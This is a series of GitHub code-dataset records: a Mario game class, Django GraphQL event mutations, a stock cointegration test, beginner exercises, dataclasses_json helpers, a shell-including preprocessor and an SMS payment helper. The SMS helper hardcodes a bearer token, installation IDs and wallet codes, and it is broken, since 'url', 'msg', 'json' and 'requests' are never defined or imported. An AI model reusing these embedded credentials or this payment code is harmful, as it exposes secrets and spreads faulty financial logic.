self.frame_empty_x=1060\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n elif self.after_jump==3:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=16\n self.frame_size_x=27\n self.size_x=29\n self.size_y=40\n elif self.after_jump==4:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=1059\n self.frame_size_x=-27\n self.size_x=29\n self.size_y=40\n \n def mario_xy(self):\n return self.x,self.y\n\n def input_xy(self,x,y):\n self.x=x\n \n def get_bb(self):\n return self.x-self.mario_size_x/2,self.y-self.mario_size_y/2,self.x+self.mario_size_x/2,self.y+self.mario_size_y/2\n\n def less_size(self):\n if self.timer > 0:\n return 0\n if self.power == 0:\n self.mario_size_x=22\n self.y-=15\n self.mario_size_y=30\n self.power = 1\n elif self.power == 1:\n pass\n elif self.power == 2:\n self.power = 1\n elif self.power == 3:\n self.power = 1\n \n self.timer=20000\n \n def more_size(self):\n if self.power == 1:\n self.mario_size_x=44\n self.y+=15\n self.mario_size_y=60\n self.power = 0\n\n def update_floor(self,y):\n self.floor = y\n\n def mario_return_move_y(self):\n return self.move_y\n\n def mario_move_y(self,y):\n self.move_y = y\n\n def mario_0_state(self):\n self.power = 0\n self.timer=20000\n\n def mario_flower_state(self):\n self.power = 2\n\n def mario_star_state(self):\n self.power = 3\n self.star_timer=70000\n\n def mario_state_return(self):\n return self.power\n\n def mario_stance_timer(self):\n return self.timer\n\n def mario_jump_state(self):\n return self.jump\n\n\n\n\n\n \n","repo_name":"tobing7799/2D-","sub_path":"character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":11434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21616166329","text":"import graphene\nfrom graphene import NonNull\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import PermissionDenied, ValidationError\nfrom django.shortcuts import get_object_or_404\nfrom django.utils import timezone\nfrom decorators import login_required, staff_member_required, permission_required\n\nfrom apps.organizations.models import Organization\nfrom apps.organizations.permissions import check_user_membership\n\nfrom .mail import EventEmail\nfrom .models import Category, Event, SignUp\nfrom .types import CategoryType, EventType\n\n\nclass BaseEventInput:\n title = 
graphene.String(required=True)\n description = graphene.String(required=True)\n start_time = graphene.DateTime(required=True)\n is_attendable = graphene.Boolean(required=True)\n end_time = graphene.DateTime(required=False)\n location = graphene.String(required=False)\n category_id = graphene.ID(required=False)\n image = graphene.String(required=False)\n deadline = graphene.DateTime(required=False)\n signup_open_date = graphene.DateTime(required=False)\n available_slots = graphene.Int(required=False)\n price = graphene.Float(required=False)\n short_description = graphene.String(required=False)\n has_extra_information = graphene.Boolean(required=False)\n contact_email = graphene.String(required=False)\n binding_signup = graphene.Boolean(required=False)\n allowed_grade_years = graphene.List(NonNull(graphene.Int))\n\n\nclass CreateEventInput(BaseEventInput, graphene.InputObjectType):\n organization_id = graphene.ID(required=True)\n\n\nclass UpdateEventInput(BaseEventInput, graphene.InputObjectType):\n title = graphene.String(required=False)\n description = graphene.String(required=False)\n start_time = graphene.DateTime(required=False)\n organization_id = graphene.ID(required=False)\n is_attendable = graphene.Boolean(required=False)\n\n\nclass CreateEvent(graphene.Mutation):\n \"\"\"\n Create a new event\n \"\"\"\n\n ok = graphene.Boolean()\n event = graphene.Field(EventType)\n\n class Arguments:\n event_data = CreateEventInput(required=True)\n\n @permission_required(\"events.add_event\")\n def mutate(self, info, event_data):\n try:\n organization = Organization.objects.get(id=event_data.get(\"organization_id\"))\n except Organization.DoesNotExist:\n raise ValueError(\"Ugyldig forening oppgitt\")\n\n check_user_membership(info.context.user, organization)\n\n event = Event()\n for k, v in event_data.items():\n setattr(event, k, v)\n event.publisher = info.context.user\n event.save()\n ok = True\n return CreateEvent(event=event, ok=ok)\n\n\nclass UpdateEvent(graphene.Mutation):\n \"\"\"\n Updates the event with a given ID with the data in event_data\n \"\"\"\n\n class Arguments:\n id = graphene.ID(required=True)\n event_data = UpdateEventInput(required=False)\n\n ok = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.change_event\")\n def mutate(self, info, id, event_data):\n try:\n event = Event.objects.get(pk=id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n\n for k, v in event_data.items():\n setattr(event, k, v)\n event.save()\n ok = True\n return UpdateEvent(event=event, ok=ok)\n\n\nclass DeleteEvent(graphene.Mutation):\n \"\"\"\n Deletes the event with the given ID\n \"\"\"\n\n class Arguments:\n id = graphene.ID()\n\n ok = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.delete_event\")\n def mutate(self, info, id):\n try:\n event = Event.objects.get(pk=id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n\n event.delete()\n ok = True\n return DeleteEvent(event=event, ok=ok)\n\n\nclass EventSignUpInput(graphene.InputObjectType):\n extra_information = graphene.String(required=False)\n\n\nclass EventSignUp(graphene.Mutation):\n \"\"\"\n Creates a new Sign Up for the user that sent the request, for the event\n with the given ID\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n data = 
EventSignUpInput(required=False)\n\n is_full = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.add_signup\")\n def mutate(self, info, event_id, data):\n try:\n event: Event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n now = timezone.now()\n\n if now < event.signup_open_date:\n raise Exception(\"Arrangementet er ikke åpent for påmelding enda\")\n if event.deadline is not None and now > event.deadline:\n raise ValidationError(\"Påmelding for arrangementet er stengt\")\n\n user = info.context.user\n\n if not str(user.grade_year) in event.allowed_grade_years:\n raise PermissionDenied(\n \"Kun studenter i følgende trinn kan melde seg på\",\n event.allowed_grade_years,\n )\n\n if SignUp.objects.filter(event_id=event_id, is_attending=True, user_id=info.context.user.id).exists():\n raise Exception(\"Du kan ikke melde deg på samme arrangement flere ganger\")\n\n sign_up = SignUp()\n if data.extra_information:\n setattr(sign_up, \"extra_information\", data.extra_information)\n\n setattr(sign_up, \"timestamp\", now)\n setattr(sign_up, \"is_attending\", True)\n setattr(sign_up, \"event\", event)\n setattr(sign_up, \"user\", user)\n setattr(sign_up, \"user_email\", user.email)\n setattr(sign_up, \"user_allergies\", user.allergies)\n setattr(sign_up, \"user_phone_number\", user.phone_number)\n setattr(sign_up, \"user_grade_year\", user.grade_year)\n\n sign_up.save()\n return EventSignUp(event=event, is_full=event.is_full)\n\n\nclass EventSignOff(graphene.Mutation):\n \"\"\"\n Sets the field is_attending to False in the Sign Up for the user that\n sent the request, for the event with the given ID\n NOTE: The sign up still exists, it is not deleted from the database\n when a user signs off an event\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n\n is_full = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.change_signup\")\n def mutate(self, info, event_id):\n try:\n event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n user = info.context.user\n\n if event.binding_signup and user in event.users_attending:\n raise Exception(\"Du kan ikke melde deg av et arrangement med bindende påmelding.\")\n\n try:\n sign_up = SignUp.objects.get(is_attending=True, user=user, event=event)\n except SignUp.DoesNotExist:\n raise Exception(\"Du er ikke påmeldt\")\n\n setattr(sign_up, \"is_attending\", False)\n sign_up.save()\n return EventSignOff(event=event, is_full=event.is_full)\n\n\nclass AdminEventSignOff(graphene.Mutation):\n \"\"\"\n Sets the field is_attending to False in the Sign Up for the user with the\n given ID, for the event with the given ID\n NOTE: The sign up still exists, it is not deleted from the database\n when a user signs off an event\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n user_id = graphene.ID(required=True)\n\n event = graphene.Field(EventType)\n\n @permission_required(\"events.change_signup\")\n def mutate(self, info, event_id, user_id):\n try:\n event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n\n try:\n user = get_user_model().objects.get(pk=user_id)\n except Event.DoesNotExist:\n raise ValueError(\"Kunne ikke finne brukeren\")\n\n try:\n sign_up = SignUp.objects.get(is_attending=True, user=user, event=event)\n 
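`EventSignUp.mutate` above layers three eligibility gates (open date, deadline, allowed grade years) before creating a `SignUp` row. The same checks as a small pure function, handy for unit testing them without the GraphQL plumbing (names are illustrative):

```python
from datetime import datetime, timedelta

def can_sign_up(now, open_date, deadline, grade_year, allowed_grades):
    # Order matters: not-yet-open, then closed, then grade restriction.
    if now < open_date:
        return False, "signup is not open yet"
    if deadline is not None and now > deadline:
        return False, "signup is closed"
    if str(grade_year) not in allowed_grades:
        return False, "grade year not allowed"
    return True, "ok"

now = datetime(2021, 9, 1, 12, 0)
print(can_sign_up(now, now - timedelta(days=1), now + timedelta(days=1),
                  3, ["2", "3"]))  # (True, 'ok')
```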
except SignUp.DoesNotExist:\n raise Exception(\"Kunne ikke finne påmeldingen\")\n\n setattr(sign_up, \"is_attending\", False)\n sign_up.save()\n\n return AdminEventSignOff(event=event)\n\n\nclass CategoryInput(graphene.InputObjectType):\n name = graphene.String(required=False)\n\n\nclass CreateCategory(graphene.Mutation):\n \"\"\"\n Create a new event category\n \"\"\"\n\n ok = graphene.Boolean()\n category = graphene.Field(CategoryType)\n\n class Arguments:\n category_data = CategoryInput(required=True)\n\n @staff_member_required\n def mutate(self, info, category_data):\n category = Category()\n for k, v in category_data.items():\n setattr(category, k, v)\n category.save()\n ok = True\n return CreateCategory(category=category, ok=ok)\n\n\nclass UpdateCategory(graphene.Mutation):\n \"\"\"\n Updates the category with a given ID with the data in category_data\n \"\"\"\n\n class Arguments:\n id = graphene.ID(required=True)\n category_data = CategoryInput(required=False)\n\n ok = graphene.Boolean()\n category = graphene.Field(CategoryType)\n\n @staff_member_required\n def mutate(self, info, id, category_data):\n category = get_object_or_404(Category, pk=id)\n\n for k, v in category_data.items():\n setattr(category, k, v)\n category.save()\n ok = True\n return UpdateCategory(category=category, ok=ok)\n\n\nclass DeleteCategory(graphene.Mutation):\n \"\"\"\n Deletes the category with a given ID\n \"\"\"\n\n class Arguments:\n id = graphene.ID()\n\n ok = graphene.Boolean()\n category = graphene.Field(CategoryType)\n\n @staff_member_required\n def mutate(self, info, id):\n category = get_object_or_404(Category, pk=id)\n category.delete()\n ok = True\n return DeleteCategory(category=category, ok=ok)\n\n\nclass SendEventEmails(graphene.Mutation):\n \"\"\"\n Send an email to all users signed up to an event\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n receiver_emails = graphene.List(NonNull(graphene.String))\n content = graphene.String()\n subject = graphene.String(required=True)\n\n ok = graphene.Boolean()\n\n @login_required\n def mutate(self, info, event_id, receiver_emails: list[str], content: str, subject: str):\n try:\n event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n receiver_emails.append(info.context.user.email)\n\n for i in range(0, len(receiver_emails), settings.EMAIL_MAX_RECIPIENTS):\n EventEmail.send_event_emails(\n receiver_emails[i : i + settings.EMAIL_MAX_RECIPIENTS], content, subject, event\n )\n\n ok = True\n return SendEventEmails(ok=ok)\n","repo_name":"rubberdok/indok-web","sub_path":"backend/apps/events/mutations.py","file_name":"mutations.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"72130480507","text":"\nfrom statsmodels.tsa.stattools import adfuller\nfrom itertools import combinations\nimport pandas as pd \n\n\nPATH_TO_DATA = '../StockData/'\nSTART_DATE = '2018-9-26'\n\n#give it a string and then use the .split(',')\ntickers = \"MMM,ABT,ABBV,ABMD,ACN,ATVI,ADBE,AMD,AAP,AES,AET,AMG,AFL,A,APD,AKAM,ALK,ALB,ARE,ALXN,ALGN,ALLE,AGN,ADS\"\n\ntickers = tickers.strip().split(',')\n\ndfs = [] \n\nfor ticker in tickers:\n\tdfs.append((pd.read_pickle(PATH_TO_DATA + f\"{ticker}.pkl\")[START_DATE:], ticker))\n\nresults = []\ncount = 0\nfor pair in combinations(tickers, 2):\n\tcount += 1 \n\tind1 = tickers.index(pair[0])\n\tind2 = 
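`SendEventEmails` above splits the recipient list into slices of `settings.EMAIL_MAX_RECIPIENTS` so no single message exceeds the backend's limit. The slicing idiom in isolation (the limit of 3 here is only for the demo):

```python
def batches(recipients, max_per_mail):
    # Same stride-slicing loop as in SendEventEmails.mutate.
    for i in range(0, len(recipients), max_per_mail):
        yield recipients[i:i + max_per_mail]

emails = ["user{}@example.org".format(n) for n in range(7)]
print([len(b) for b in batches(emails, 3)])  # [3, 3, 1]
```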
tickers.index(pair[1])\n\n\tdf1 = dfs[ind1][0]\n\tdf2 = dfs[ind2][0]\n\n\t#need to verify they are coming from the correct dataframe\n\tassert pair[0] == dfs[ind1][1]\n\tassert pair[1] == dfs[ind2][1]\n\n\tif len(df1) != len(df2):\n\t\tcontinue \n\n\tresults.append((f\"{pair[0]}, {pair[1]}\", adfuller(df1['close'] - df2['close'])[1]))\n\nresults = sorted(results, key=lambda x: x[1])\nresults = [r for r in results if r[1] < .05]\n\nprint('cointegrated tickers:\\n******************************')\nfor r in results:\n\tprint(r)\n\t\nsig = len(results)\n\nprint(f\"out of {count} pairs, there were {sig} that were statistically significant\\n{sig/count}%\")","repo_name":"clinestanford/USUInvest18-19","sub_path":"bot/Backtesting/ADF_test.py","file_name":"ADF_test.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21925884858","text":"a=int(input(\"rows:\"))\r\nb=a\r\nprint(\"rows=column i.e.\",b)\r\n\r\nfor i in range(1,a+1):\r\n for j in range(1,b+1):\r\n if j<=i:\r\n if j%2!=0:\r\n print(\"1\",end=\"\")\r\n else:\r\n print(\"0\",end='')\r\n else:\r\n print(\" \",end=\"\")\r\n print()\r\n\r\n\r\n'''\r\n1\r\n10\r\n101\r\n1010\r\n10101\r\n101010\r\n'''\r\n\r\n","repo_name":"Debajyoti69/Competitive-Programming","sub_path":"Star pattern/star_pattern23.py","file_name":"star_pattern23.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73483447869","text":"from timeit import default_timer as timer\n# Initiation of strings\n\nstr1 = \"Hello world\"\nprint(str1, \"str1\")\n\nstr2 = 'Sample text'\nprint(str2, \"str2\")\n\n\n# Accessing string\nprint(str1[0], \"first_idx_inplace\")\n\n\n# Looping strings\nfor char in str1:\n print(char, \"loop_str\")\n\n# Slicing strings\nstr1 = str1[1:2]\nprint(str1, \"sliced_string\")\nstr3 = \"Sample\"\nstr3 = str3[::-1]\nprint(str3, \"reverse_string\")\n\n\n#replace\n\nstr4 = \"hello Avinash\"\nstr4 = str4.replace(\"Avinash\", \"Dinesh\")\nprint(str4, \"replace\")\n\n#find and count\n\nstr5 = \"my text\"\nstr5 = str5.find(\"text\")\nprint(str5, \"find_index\")\n\nstr6 = \"abcdddfdefdf\"\nstr6 = str6.count(\"d\")\nprint(str6, 'str6')\n\n# timer\n\nstart = timer()\n\nreverse_char = \"reverse\"\n\nfor char in reverse_char[::-1]:\n reverse_char += char\n\nstop = timer()\n\n\nprint(reverse_char, \"reverse_time1\")\nprint(stop-start, \"time_taken\")\n\n\n#formatting string\n\nsample1 = '''Hello\nhei\nhi'''\n\nprint(sample1, \"multi liner\")\n\nput_this = \"avi\"\n\nprint_this1 = \"hello %s welcome\" % put_this\n\nprint(print_this1, \"percent_formatter\")\n\n\nput_this1 = \"hey\"\n\nprint(\"hello {} {}\".format(put_this1, put_this1), \"string_format\")\n\nmy_string = f'this variable is {put_this}'\n\nprint(my_string, \"-f string\")\n\n#convert string to list and list to string\n\nsample2 = \"hello\"\nsample2 = sample2.split(\"\")\n\nprint(sample2, \"split\")\n\nsample2 = \"\".join(sample2)\n\nprint(sample2, \"join\")","repo_name":"aviabstraction/basics","sub_path":"Algorithms/python_basics/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7087758776","text":"import inspect\nimport sys\nfrom datetime import datetime, timezone\nfrom typing import Collection, Mapping, Optional, TypeVar, Any\n\n\ndef _get_type_cons(type_):\n \"\"\"More 
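The pair-trading script above calls `adfuller` on the close-price spread of every ticker pair and keeps those with p < .05. A self-contained demonstration on synthetic data, where two series share a common random walk and their spread is therefore stationary:

```python
import numpy as np
from statsmodels.tsa.stattools import adfuller

rng = np.random.default_rng(0)
common = np.cumsum(rng.normal(size=500))        # shared random walk
a = common + rng.normal(scale=0.5, size=500)
b = common + rng.normal(scale=0.5, size=500)

p_value = adfuller(a - b)[1]                    # index 1 is the p-value
print("ADF p-value of the spread: %.4f" % p_value)  # small => cointegrated
```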
spaghetti logic for 3.6 vs. 3.7\"\"\"\n    if sys.version_info.minor == 6:\n        try:\n            cons = type_.__extra__\n        except AttributeError:\n            try:\n                cons = type_.__origin__\n            except AttributeError:\n                cons = type_\n            else:\n                cons = type_ if cons is None else cons\n        else:\n            cons = type_ if cons is None else cons\n    else:\n        try:\n            cons = type_.__origin__\n        except AttributeError:\n            cons = type_\n        else:\n            cons = type_ if cons is None else cons\n    return cons\n\n\ndef _get_type_origin(type_):\n    \"\"\"Some spaghetti logic to accommodate differences between 3.6 and 3.7 in\n    the typing api\"\"\"\n    try:\n        origin = type_.__origin__\n    except AttributeError:\n        if sys.version_info.minor == 6:\n            try:\n                origin = type_.__extra__\n            except AttributeError:\n                origin = type_\n            else:\n                origin = type_ if origin is None else origin\n        else:\n            origin = type_\n    return origin\n\n\ndef _hasargs(type_, *args):\n    try:\n        res = all(arg in type_.__args__ for arg in args)\n    except AttributeError:\n        return False\n    except TypeError:\n        if type_.__args__ is None:\n            return False\n        else:\n            raise\n    else:\n        return res\n\n\ndef _isinstance_safe(o, t):\n    try:\n        result = isinstance(o, t)\n    except Exception:\n        return False\n    else:\n        return result\n\n\ndef _issubclass_safe(cls, classinfo):\n    try:\n        return issubclass(cls, classinfo)\n    except Exception:\n        return (\n            _is_new_type_subclass_safe(cls, classinfo) if _is_new_type(cls) else False\n        )\n\n\ndef _is_new_type_subclass_safe(cls, classinfo):\n    super_type = getattr(cls, \"__supertype__\", None)\n\n    if super_type:\n        return _is_new_type_subclass_safe(super_type, classinfo)\n\n    try:\n        return issubclass(cls, classinfo)\n    except Exception:\n        return False\n\n\ndef _is_new_type(type_):\n    return inspect.isfunction(type_) and hasattr(type_, \"__supertype__\")\n\n\ndef _is_optional(type_):\n    return (\n        _issubclass_safe(type_, Optional) or _hasargs(type_, type(None)) or type_ is Any\n    )\n\n\ndef _is_mapping(type_):\n    return _issubclass_safe(_get_type_origin(type_), Mapping)\n\n\ndef _is_collection(type_):\n    return _issubclass_safe(_get_type_origin(type_), Collection)\n\n\ndef _is_nonstr_collection(type_):\n    return _issubclass_safe(\n        _get_type_origin(type_), Collection\n    ) and not _issubclass_safe(type_, str)\n\n\ndef _timestamp_to_dt_aware(timestamp: float):\n    tz = datetime.now(timezone.utc).astimezone().tzinfo\n    dt = datetime.fromtimestamp(timestamp, tz=tz)\n    return dt\n\n\ndef _undefined_parameter_action_safe(cls):\n    try:\n        if cls.dataclass_json_config is None:\n            return\n        action_enum = cls.dataclass_json_config[\"undefined\"]\n    except (AttributeError, KeyError):\n        return\n\n    if action_enum is None or action_enum.value is None:\n        return\n\n    return action_enum\n\n\ndef _handle_undefined_parameters_safe(cls, kvs, usage: str):\n    \"\"\"\n    Checks if an undefined parameters action is defined and performs the\n    according action.\n    \"\"\"\n    undefined_parameter_action = _undefined_parameter_action_safe(cls)\n    usage = usage.lower()\n    if undefined_parameter_action is None:\n        return kvs if usage != \"init\" else cls.__init__\n    if usage == \"from\":\n        return undefined_parameter_action.value.handle_from_dict(cls=cls, kvs=kvs)\n    elif usage == \"to\":\n        return undefined_parameter_action.value.handle_to_dict(obj=cls, kvs=kvs)\n    elif usage == \"dump\":\n        return undefined_parameter_action.value.handle_dump(obj=cls)\n    elif usage == \"init\":\n        return undefined_parameter_action.value.create_init(obj=cls)\n    else:\n        raise ValueError(\n            f\"usage must be one of ['to', 'from', 'dump', 'init'], \" f\"but is '{usage}'\"\n        )\n\n\n# Define a type for the CatchAll field\n# 
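The 3.6/3.7 version shims above predate `typing.get_origin` and `typing.get_args`; on Python 3.8+ the stdlib exposes the same information directly:

```python
from typing import List, Mapping, Optional, get_args, get_origin

print(get_origin(List[int]))          # <class 'list'>
print(get_origin(Mapping[str, int]))  # <class 'collections.abc.Mapping'>
print(get_args(Optional[int]))        # (<class 'int'>, <class 'NoneType'>)
```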
https://stackoverflow.com/questions/59360567/define-a-custom-type-that-behaves-like-typing-any\nCatchAllVar = TypeVar(\"CatchAllVar\", bound=Mapping)\n","repo_name":"DVE2000/Dogbone","sub_path":"py_packages/dataclasses_json/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"6"} +{"seq_id":"33385379053","text":"#!/usr/bin/python\n# coding=utf-8\n\nfrom __future__ import print_function\nimport argparse\nimport os\nimport subprocess\nimport sys\n\n\nclass Processor(object):\n \"\"\"\n :type str markup\n :type str working_directory\n \"\"\"\n\n def __init__(self, working_directory=None, markup='@tsincluder'):\n self.markup = markup\n\n if working_directory is None:\n working_directory = os.getcwd()\n self.working_directory = working_directory\n\n def process(self, line):\n markup = self.markup.strip() + ' '\n if markup in line:\n prefix = line[0:line.rfind(markup)]\n\n shell_command = line.replace(prefix, '').replace(markup, '')\n text = subprocess.Popen(\n shell_command,\n shell=True,\n stdout=subprocess.PIPE,\n cwd=self.working_directory\n ).stdout.read()\n\n rows = text.split('\\n')\n line = ''\n for row in rows:\n if len(row.strip()) != 0:\n line += prefix + row.strip() + '\\n'\n\n return line\n\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('infile', help=\"input file to transform\", type=argparse.FileType('r'))\n args = parser.parse_args(arguments)\n\n processor = Processor()\n for line in args.infile:\n line = processor.process(line)\n print(line, end='')\n\ndef run():\n main(sys.argv[1:])\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"FabienArcellier/tsincluder","sub_path":"tsincluder/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22675821888","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 07 21:36:53 2016\n\n@author: ajatgd\n\"\"\"\n\ndef find(str, ch):\n for i, ltr in enumerate(str):\n if ltr == ch:\n yield i\n \ndef smsRes(request):\n id1=['I8ckg12tIqOpz613Sf/VLPClcVhOTKH2','6lAPqTztmhj/1ml4NmER+KXwJev8eMWN','I8ckg12tIqOpz613Sf/VLPClcVhOTKH2','I8ckg12tIqOpz613Sf/VLPClcVhOTKH2']\n wallet=['4817497275977414861','5622253132157119015','5243188823714477159','5014900270407291489']\n body = request.POST.get('Body', '')\n number = request.POST.get('From','')\n comma_index= list(find(',',body))\n if(body[:8]=='payprem'):\n identity=body[9:comma_index[0]]\n wc=body[comma_index[0]:]\n amt=20\n if (identity in id1) and (wc in wallet):\n confirmpayment(identity,wc,amt)\n \n if(body[:8]=='getsubs'):\n identity=body[9:comma_index[0]]\n wc=body[comma_index[0]:]\n amt=20\n if identity in id1 and wc in wallet:\n banktocus(identity,wc,amt)\n \n r = Response()\n r.message(msg)\ndef confirmpayment(identity,wc,amt):\n \n w2='5622253132157119015'\n payload={\n \"FromWalletCode\": wc,\n \"ToWalletCode\": w2,\n \"Date\": \"20/12/2015\",\n \"Amount\": amt,\n \"Reason\": \"Transfer to test transaction\"\n }\n payld=json.dumps(payload)\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID':'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n print(\"transfer funds 1 to 2\")\n response20= 
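`Processor.process` in the tsincluder record above shells out for every line carrying the `@tsincluder` marker and re-emits each output line under the original prefix. The core substitution, reduced to a standalone function (`subprocess.run` with `capture_output` needs Python 3.7+):

```python
import subprocess

def expand(prefix, command, cwd="."):
    # Run the command and indent every non-empty output line like the source.
    out = subprocess.run(command, shell=True, cwd=cwd,
                         capture_output=True, text=True).stdout
    return "".join(prefix + line.strip() + "\n"
                   for line in out.splitlines() if line.strip())

print(expand("// ", "echo one && echo two"))
```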
requests.post(url,headers=headers,data=payld)\n response20=json.loads(response20.text)\n print(response20)\n return(str(response20['Message']))\n\n \ndef banktocus(identity,wc,amt):\n w2='5622253132157119015'\n payload={\n \"FromWalletCode\": w2,\n \"ToWalletCode\": wc,\n \"Date\": \"20/12/2015\",\n \"Amount\": amt,\n \"Reason\": \"Transfer to test transaction\"\n }\n payld=json.dumps(payload)\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID':'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n print(\"transfer funds 1 to 2\")\n response9= requests.post(url,headers=headers,data=payld)\n response9=json.loads(response9.text)\n print(response9)\n return(str(response9['Message']))\n \n \n \n \n \ndef trans_his(identity,wc):\n url='https://api.dev.modjadji.org:8243/tipsgo_dev/v1.0.0/api/wallet/GetWalletTransactions?walletCode='+wc+'&startDate=01/01/2015&endDate=04/11/2016&pageNum=0&pageSize=0'\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID':'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n res=requests.get(url,headers=headers)\n res=json.loads(res.text)\n message=str(res['Message'])\n tran_hist=str(res['ListOfObjects'][1]['TranAmount'])\n return(message+'last trans'+tran_hist)\n \n \n \n \ndef wallet_details(identity,wc):\n url='https://api.dev.modjadji.org:8243/tipsgo_dev/v1.0.0/api/wallet/GetWalletInfo?walletCode='+wc\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID': 'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n print(\"wallet 1 updated info\")\n response7= requests.get(url,headers=headers)\n response7=json.loads(response7.text)\n print(response7)\n message=str(response7['Message'])\n bal=str(response7['DataObject']['CurrentBalance'])\n return(message+'current balance'+bal)\n ","repo_name":"ajatgd/finclusion-sms","sub_path":"fincSMS/required_fn.py","file_name":"required_fn.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18842246442","text":"\r\n#program to print all the prime numbers in a given interval\r\nlower = int(input(\"Enter the lower range: \"))\r\nupper = int(input(\"Enter the upper range: \"))\r\nfor n in range(lower,upper+1):\r\n if(n > 1):\r\n for i in range(2,n):\r\n if(n % i) == 0:\r\n break\r\n else:\r\n print(n)\r\n#now to check a given number is prime or not\r\na= int(input(\"Enter a number: \"))\r\nj=1\r\nif(a > 1):\r\n for j in range(2,a):\r\n if(a % j) == 0:\r\n print(a,\"is not a prime number\")\r\n break\r\n else:\r\n print(a,\"is prime\")\r\nelse:\r\n print(a,\"is not a prime number\") \r\n","repo_name":"SwastiPatra/Task_0","sub_path":"num5.py","file_name":"num5.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71148684667","text":"\"\"\"\nProblem Statement : Given an array of unsorted numbers and a target number, find a triplet in the array whose sum is as close to the target number as possible, return the sum of the triplet. 
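The prime scan above trial-divides every candidate by all smaller numbers, which is O(n) per check. Stopping at the square root is enough and yields the same primes:

```python
def is_prime(n):
    # A factor above sqrt(n) always pairs with one below it.
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return False
        f += 2
    return True

print([n for n in range(2, 30) if is_prime(n)])
```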
If there are more than one such triplet, \nreturn the sum of the triplet with the smallest sum.\n\"\"\"\n\nimport math\n\n\"\"\"\nSolution: O(N^2)\n\"\"\"\n\ndef triple_sum_close(arr,target):\n arr.sort() #sort the array\n smallest_difference = math.inf #initiate this to the largest number\n\n for i in range(len(arr)-2): #we are searching in triplets. preventing it from going out of bound\n left_pt = i + 1 #initialize the pointers\n right_pt =len(arr) -1\n\n while (left_pt < right_pt):\n cur_sum = arr[i] + arr[left_pt] + arr[right_pt] #sum of values two pointers \n target_dif = target - cur_sum #calculate the difference from the target \n\n if target_dif == 0: #smallest sum we can get \n return target\n \n if abs(target_dif) < abs(smallest_difference) or (abs(target_dif) == abs(smallest_difference) and target_dif > smallest_difference):\n smallest_difference = target_dif #update the smallest_difference \n\n if target_dif > 0:\n left_pt += 1 # if the target difference is positive, it means we have a smaller cur_sum than target. increment the left pt\n else:\n right_pt -= 1 #otherwise, decrement the right pt \n return target - smallest_difference\n\n\n\narr= [-2, 0, 1, 2]\ntarget=2\n\nresult = 